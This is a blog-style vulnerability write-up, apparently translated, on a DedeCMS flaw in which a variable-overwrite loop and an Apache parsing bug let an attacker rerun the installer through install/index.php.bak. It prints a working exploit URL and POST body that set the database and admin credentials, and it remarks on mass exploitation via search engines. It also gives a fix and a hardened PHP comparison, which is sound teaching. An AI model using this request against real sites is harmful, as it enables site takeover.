Today I saw an article by SysShell about this vulnerability (http://www.bkjia.com/Article/201306/217870.html). It is very concise and only gives a test URL. I have not written an original article for a long time; I have been busy writing a source code audit system recently, and it should be ready to meet you within a week at the latest. I have already completed high-precision automatic white-box vulnerability auditing, code highlighting, vulnerability locating, function/variable lists, code debugging, function query, variable/function tracing, automatic upgrade, a custom editor, and many other practical functions.
Now, everyone should know how dangerous this reinstallation vulnerability is, so I will not say much about it. It is estimated that another batch of sites will be hit. The conditions are that the web server has the Apache parsing vulnerability and that the install folder still exists.
Exploitation:
After DedeCMS is installed, it backs up the installation file /install/index.php as /install/index.php.bak, which Apache (with the parsing vulnerability) still parses and executes as PHP.
Look at the code of /install/index.php.bak:
$verMsg = 'v5.7 GBKSP1';
$s_lang = 'gb2312';
$dfDbname = 'destmsv57gbksp1';
$errmsg = '';
$install_demo_name = 'dev57demo.txt';
$insLockfile = dirname(__FILE__).'/install_lock.txt';
$moduleCacheFile = dirname(__FILE__).'/modules.tmp.inc';
define('DEDEINC', dirname(__FILE__).'/../include');
define('DEDEDATA', dirname(__FILE__).'/../data');
define('DEDEROOT', preg_replace("#[\\\\/]install#", '', dirname(__FILE__)));
header("Content-Type: text/html; charset={$s_lang}");
require_once(DEDEROOT.'/install.inc.php');
require_once(DEDEINC.'/zip.class.php');
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}
require_once(DEDEINC.'/common.func.php');
if(file_exists($insLockfile))
{
    exit("The program has already been installed. If you are sure you want to reinstall it, delete install/install_lock.txt via FTP first!");
}
if(empty($step))
{
    $step = 1;
}
$insLockfile = dirname(__FILE__).'/install_lock.txt'; is the installation lock file. Further down there is:
if(file_exists($insLockfile))
{
    exit("The program has already been installed. If you are sure you want to reinstall it, delete install/install_lock.txt via FTP first!");
}
This code means: if the file $insLockfile exists, the program reports that it has already been installed; if it does not exist, the installation continues. So to reinstall, we need to control $insLockfile.
The key issue is that another piece of DedeCMS code makes variables overwritable:
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}
This is the variable registration loop: every request parameter becomes a variable, and if a variable with that name already exists it is simply overwritten.
So we can just add insLockfile=seay to the request, which changes $insLockfile to 'seay'. That file naturally does not exist, so the installation runs again.
Demo:
POST the data directly to this URL:
http://www.cnseay.com/dedecms/install/index.php.bak?insLockfile=1&step=4
OK.
POST Data:
step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&adminuser=admin&adminpwd=admin&cookieencode=JzIVw7439H&webname=%CE%D2%B5%C4%CD%F8%D5%BE&adminmail=admin%40dedecms.com&baseurl=http%3A%2F%2Flocalhost&cmspath=%2Fdedecms
Modify the dbhost information and submit the packet. The effect is as follows:
Reinstalled... I am a good citizen.
I won't write a batch EXP; do it yourselves. With an exp and batch Google searches, it is estimated that more than half of all DedeCMS sites would go down.
Solution:
Delete install/index.php.bak, or rename it to install/index.bak.
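The following is an added example, not code from the original post or from DedeCMS. It reproduces the lock check described above in two forms: the original register-globals loop, where a request key named insLockfile silently replaces the lock path, and a hardened loop that refuses any request key colliding with a variable the script already defined. RunMagicQuotes() is stubbed as a plain addslashes(), the temporary directory and the two request arrays are constructed for the demo, and the function names are my own.

```php
<?php
// Added example; this is not code from the original post or from DedeCMS.
// It simulates install/index.php's lock check with (a) the original
// register-globals loop and (b) a hardened loop that refuses request keys
// colliding with variables the script already defined (such as $insLockfile).

// Stand-in for DedeCMS's RunMagicQuotes(); assumed here to be a plain addslashes().
function RunMagicQuotes($v)
{
    return is_array($v) ? array_map('RunMagicQuotes', $v) : addslashes($v);
}

// (a) The pattern from install/index.php: every request key becomes a local
//     variable, so a request key "insLockfile" replaces the lock path.
function lockCheckVulnerable(array $request, $lockDir)
{
    $insLockfile = $lockDir . '/install_lock.txt';
    foreach ($request as $_k => $_v) {
        ${$_k} = RunMagicQuotes($_v);   // no check that $insLockfile already exists
    }
    return file_exists($insLockfile) ? 'locked' : 'install-continues';
}

// (b) Hardened: snapshot the variable names defined before the request is
//     processed and reject any request key that matches one of them, or that
//     is not a plain identifier (this also protects $_k, $_v and $request).
function lockCheckHardened(array $request, $lockDir)
{
    $insLockfile = $lockDir . '/install_lock.txt';
    $predefined  = array_keys(get_defined_vars());   // request, lockDir, insLockfile
    foreach ($request as $_k => $_v) {
        if (!preg_match('/^[A-Za-z][A-Za-z0-9]*$/', (string) $_k)
            || in_array((string) $_k, $predefined, true)) {
            return 'rejected: ' . $_k;   // the real script would exit() here
        }
        ${$_k} = RunMagicQuotes($_v);
    }
    return file_exists($insLockfile) ? 'locked' : 'install-continues';
}

// Constructed demo: a temporary directory that already holds install_lock.txt,
// i.e. a site whose installation has finished.
$lockDir = sys_get_temp_dir() . '/dede_lock_demo_' . getmypid();
mkdir($lockDir);
file_put_contents($lockDir . '/install_lock.txt', 'installed');

$normal  = array('step' => '1');                          // ordinary request
$hostile = array('insLockfile' => 'seay', 'step' => '4'); // the request from the post

echo "vulnerable, normal : ", lockCheckVulnerable($normal,  $lockDir), "\n";
echo "vulnerable, hostile: ", lockCheckVulnerable($hostile, $lockDir), "\n";
echo "hardened,   normal : ", lockCheckHardened($normal,   $lockDir), "\n";
echo "hardened,   hostile: ", lockCheckHardened($hostile,  $lockDir), "\n";

unlink($lockDir . '/install_lock.txt');
rmdir($lockDir);
```

Run with php on the command line: the vulnerable function reports "locked" for the ordinary request but "install-continues" for the request carrying insLockfile=seay, while the hardened function reports "locked" and "rejected: insLockfile" respectively. This closes only the variable-overwrite half of the problem; the other precondition, Apache executing index.php.bak as PHP, is what the solution above addresses by removing the backup file, and in general the PHP handler should only match file names that end in .php.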